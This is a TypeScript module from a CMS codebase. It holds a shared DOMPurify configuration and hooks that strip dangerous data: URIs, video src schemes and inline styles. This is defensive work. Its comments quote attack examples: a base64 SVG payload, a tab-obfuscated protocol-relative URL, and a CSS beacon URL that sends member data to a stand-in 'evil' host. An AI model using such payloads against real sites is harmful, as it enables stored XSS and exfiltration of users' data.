import type { Config, DOMPurify } from 'dompurify';

/**
 * Shared DOMPurify configuration consumed by both ends of the
 * sanitisation pipeline:
 *
 *   - write-time, server-side: `apps/api/src/modules/content/authoring`
 *     calls `isomorphic-dompurify` with this config to sanitise editor
 *     input before persisting it.
 *   - read-time, client-side: `apps/web/src/content/components/SanitizedHtml.tsx`
 *     calls `dompurify` with this config to sanitise content before
 *     rendering it via `dangerouslySetInnerHTML`.
 *
 * FR-026 (021-cms) requires write-time sanitisation policy to match
 * read-time. Having both ends import the same factory makes the policy
 * a single concrete artefact rather than a convention enforced by code
 * review.
 *
 * The factory layers two minimal allow-additions on top of DOMPurify's
 * defaults:
 *
 *   - `ADD_ATTR: ['target']` — DOMPurify's default attribute allowlist
 *     omits `target`, which means a `<a href="..." target="_blank">`
 *     loses its `target` attribute on sanitisation. Editors authoring
 *     external links need the new-tab affordance for the usual reasons
 *     (don't navigate-away from the article they're embedded in), and
 *     the seeded article bodies under `infra/migrations/0003_content.up.sql`
 *     already use the `target="_blank" rel="noopener noreferrer"`
 *     pattern. The safety wrapper around `target="_blank"` is the
 *     `rel="noopener"` / `rel="noreferrer"` companion (prevents
 *     `window.opener` hijack); we trust the editor to keep that pair
 *     intact (and the read-time render adds nothing on top). DOMPurify's
 *     default attribute filter still strips on-event attributes
 *     (`onclick`, `onerror`, …), `javascript:` URI schemes, and the
 *     dangerous tag set (`<script>` / `<iframe>` / `<object>` /
 *     `<embed>` / …) — those continue to be stripped, unchanged.
 *
 * DOMPurify defaults — preserved here — already strip `<script>`,
 * on-event attributes (`onclick`, `onerror`, …), `javascript:` URI
 * schemes, and `<iframe>` / `<object>` / `<embed>` — the conservative
 * posture inherited from spec 003 TA25. Tightening (e.g. adding an
 * explicit tag allowlist) MUST happen here so both ends pick up the
 * change in one place, and SHOULD be recorded as an amendment to D-078
 * (or as a superseding decision-log entry).
 *
 * The `data:` URI carrier-tag attack surface is closed via
 * {@link installDataUriGuardHook} rather than via this config object,
 * because DOMPurify 3.4.17 expresses that policy only through hook
 * registration (the declarative `FORBID_DATA_URI_TAGS` flag lands in
 * 3.5.x, and the workspace is pinned to 3.4.17 per D-043 — the bump is
 * a separate work item). Each consumer of `getDompurifyConfig()` must
 * also call `installDataUriGuardHook` once at module load against its
 * own DOMPurify instance; see that helper's docblock for why
 * per-consumer registration is required.
 *
 * Returned as a fresh object on every call so callers may freely
 * augment without mutating shared state.
 */
export function getDompurifyConfig(): Config {
  return {
    ADD_ATTR: ['target'],
  };
}

/**
 * Tags whose attributes are checked for `data:` URI carriers. Mirrors
 * DOMPurify's `DEFAULT_DATA_URI_TAGS` allowlist — the only tags on
 * which `data:` URIs survive the default `ALLOWED_URI_REGEXP` — so the
 * guard is a no-op for tags where DOMPurify already strips `data:`.
 */
const DATA_URI_CARRIER_TAGS: ReadonlySet<string> = new Set([
  'img',
  'audio',
  'video',
  'source',
  'image',
  'track',
]);

/**
 * Attribute names checked for `data:` URI prefixes. `src` covers the
 * media-tag attack surface; `href` and `xlink:href` cover the
 * `<image>` SVG variant and other URI-bearing attributes that might
 * appear on the carrier tags above.
 */
const DATA_URI_CARRIER_ATTRS: ReadonlySet<string> = new Set(['src', 'xlink:href', 'href']);

/**
 * Register a hook on the supplied DOMPurify instance that strips
 * `data:` URIs from attributes on tags listed in
 * {@link DATA_URI_CARRIER_TAGS}. Closes the stored-XSS surface where
 * `<img src="data:image/svg+xml;base64,…">` smuggles an SVG payload
 * that fires `onload` at render time — DOMPurify's default
 * `ALLOWED_URI_REGEXP` permits `data:` URIs on the media-tag
 * allowlist regardless of media type, so an SVG payload base64-encoded
 * behind `image/svg+xml` survives the default policy and executes when
 * the browser loads the data URI.
 *
 * **Why per-consumer registration.** `isomorphic-dompurify` (the
 * server-side wrapper used by `apps/api`) and `dompurify` (the
 * browser-side module used by `apps/web`) are separate runtime module
 * graphs. Each ships its own DOMPurify instance with its own hook
 * registry — registering a hook on one does NOT propagate to the
 * other. A single `purify.addHook(...)` call inside this package would
 * therefore close exactly ONE consumer's surface and leave the other
 * wide open. The empirical refutation of the singleton assumption is
 * load-bearing: each consumer (HtmlSanitizer write-side, SanitizedHtml
 * read-side) must call this helper once at module load against its
 * own imported DOMPurify default export.
 *
 * If we ever migrate both consumers to a single shared-sanitizer-
 * exported DOMPurify instance (proper browser/node conditional export
 * with a window adapter; tracked separately), the consumer-side
 * registration calls become dead-removable — the shared singleton
 * would ship with the hook pre-registered.
 *
 * **Future declarative alternative.** DOMPurify 3.5.x exposes
 * `FORBID_DATA_URI_TAGS` as a declarative config flag that expresses
 * the same intent. The workspace pin (`dompurify@3.4.17`, D-043) is the
 * reason this is a hook rather than config; bumping past 3.5.x lets
 * the policy collapse into `getDompurifyConfig()` and removes the
 * per-consumer registration requirement.
 *
 * **Mechanism details.** The hook fires for every attribute on every
 * kept element, sets `keepAttr = false` when the attribute name is in
 * {@link DATA_URI_CARRIER_ATTRS}, the host tag is in
 * {@link DATA_URI_CARRIER_TAGS}, and the trimmed lowercase value
 * starts with `data:`. The attribute is then stripped by DOMPurify's
 * core, producing a byte-difference between input and output that the
 * write-side `HtmlSanitizer.sanitize` detects as a rejection.
 */
export function installDataUriGuardHook(purify: DOMPurify): void {
  purify.addHook('uponSanitizeAttribute', (node, data) => {
    if (!DATA_URI_CARRIER_ATTRS.has(data.attrName.toLowerCase())) {
      return;
    }
    const tagName = node.nodeName.toLowerCase();
    if (!DATA_URI_CARRIER_TAGS.has(tagName)) {
      return;
    }
    const value = data.attrValue.trim().toLowerCase();
    if (value.startsWith('data:')) {
      data.keepAttr = false;
    }
  });
}

/**
 * `<video>` / `<source>` — the CMS RichTextEditor's author-controlled video
 * embed (024-cms #9). The block-level `VideoNode` emits
 * `<video controls src=… class="cms-video">`; this guard hardens the read +
 * write sanitiser against a crafted variant.
 */
const VIDEO_MEDIA_TAGS: ReadonlySet<string> = new Set(['video', 'source']);

/**
 * The ONLY attributes allowed to survive on `<video>` / `<source>`. A positive
 * allowlist: any other attribute — notably inline `style` (an XSS surface) and
 * any stray event handler — is stripped. `type` covers a nested `<source>`.
 */
const VIDEO_ALLOWED_ATTRS: ReadonlySet<string> = new Set(['controls', 'src', 'class', 'type']);

/** Same-origin asset path (`/media/x.mp4`); rejects `//host`, bare `/`, relative. */
const SAME_ORIGIN_ASSET_PATH = /^\/[^/].*$/u;

/**
 * True when a media (video / image / source) `src` is a safe destination: an
 * absolute http(s) URL OR a same-origin asset path. Rejects `javascript:` /
 * `data:` / `vbscript:` / protocol-relative (`//host`) / relative.
 *
 * EXPORTED so the RichTextEditor's editor-side insert guards (`addVideo`,
 * `addImage`) apply the SAME rule as the read/write DOMPurify hook — the editor
 * then never PRODUCES a node the sanitiser would strip (defense-in-depth, one
 * source of truth; PR #387 Copilot). apps/web importing from this shared package
 * is the correct dependency direction (the inverse — importing apps/web's
 * `isSafeHttpUrl` here — is what dependency inversion forbids), so the http(s) +
 * same-origin rule lives here and both the hook and the editor consume it.
 */
export function isSafeMediaSrc(raw: string): boolean {
  // Strip the ASCII control chars a browser removes from a URL attribute (TAB,
  // LF, CR + the rest of the C0 set and DEL) BEFORE validating, so the guard
  // sees the value the browser will actually resolve. Without this,
  // `src="/\t/evil.example/x.mp4"` slips past the same-origin path test (the tab
  // matches `[^/]`) yet the browser strips the tab to `//evil.example/x.mp4` (a
  // protocol-relative URL → attacker origin). Validating the stripped form makes
  // that resolve to a protocol-relative URL here too → rejected.
  // biome-ignore lint/suspicious/noControlCharactersInRegex: intentional — these C0 controls + DEL are exactly what a browser strips from a URL attribute; matching them so validation sees the resolved value IS the fix.
  const value = raw.replace(/[\u0000-\u001f\u007f]/gu, '').trim();
  if (value.length === 0) {
    return false;
  }
  if (SAME_ORIGIN_ASSET_PATH.test(value)) {
    return true;
  }
  try {
    const { protocol } = new URL(value);
    return protocol === 'http:' || protocol === 'https:';
  } catch {
    return false;
  }
}

/**
 * Register a hook that hardens `<video>` / `<source>`: (1) strips any attribute
 * outside the positive allowlist {controls, src, class, type} — so an inline
 * `style` or crafted handler cannot ride a video; (2) scheme-guards `src` — a
 * value that is neither http(s) nor a same-origin asset path is stripped
 * (rejecting `javascript:` / `data:` / `vbscript:` / protocol-relative).
 * Complements `installDataUriGuardHook`; MUST be installed at module top-level
 * by each consumer (read-side `SanitizedHtml`, write-side `HtmlSanitizer`), like
 * the data-URI hook, so it runs before the first `sanitize`.
 */
export function installVideoSrcSchemeGuardHook(purify: DOMPurify): void {
  purify.addHook('uponSanitizeAttribute', (node, data) => {
    const tagName = node.nodeName.toLowerCase();
    if (!VIDEO_MEDIA_TAGS.has(tagName)) {
      return;
    }
    const attr = data.attrName.toLowerCase();
    if (!VIDEO_ALLOWED_ATTRS.has(attr)) {
      data.keepAttr = false;
      return;
    }
    if (attr === 'src' && !isSafeMediaSrc(data.attrValue)) {
      data.keepAttr = false;
    }
  });
}

/**
 * The ONLY inline `style` the RichTextEditor legitimately emits: the Color /
 * TextStyle mark's `color: var(--color-<token>)` (there is no TextAlign
 * extension, so no `text-align` style). DOMPurify 3.4.17 does NO CSS filtering —
 * a `style` value is URI-safe and passes byte-verbatim — so without this an
 * author could inject `style="background:url(https://evil/beacon?u=member)"`
 * (CSS exfiltration) or `style="position:fixed;inset:0;z-index:9999"` (UI
 * redress / clickjacking) that round-trips onto the MEMBER read surface. The
 * allowlist keeps ONLY the token-colour form and strips every other `style`.
 * The `var(--color-…)` reference has NO `url()`, NO fallback, and NO extra args
 * (the `)` closes immediately after the `[a-z0-9-]+` token), so it can neither
 * exfiltrate nor redress — it only recolours text.
 */
const ALLOWED_STYLE = /^\s*color:\s*var\(--color-[a-z0-9-]+\)\s*;?\s*$/iu;

/**
 * Register a hook that strips any inline `style` NOT matching {@link
 * ALLOWED_STYLE} (the editor's `color: var(--color-*)` form), on any element.
 * Closes the CSS-injection surface DOMPurify leaves open (it does not filter
 * style contents). MUST be installed at module top-level by each consumer
 * (read-side `SanitizedHtml`, write-side `HtmlSanitizer`), like the other hooks.
 */
export function installStyleAllowlistHook(purify: DOMPurify): void {
  purify.addHook('uponSanitizeAttribute', (_node, data) => {
    if (data.attrName.toLowerCase() !== 'style') {
      return;
    }
    if (!ALLOWED_STYLE.test(data.attrValue)) {
      data.keepAttr = false;
    }
  });
}
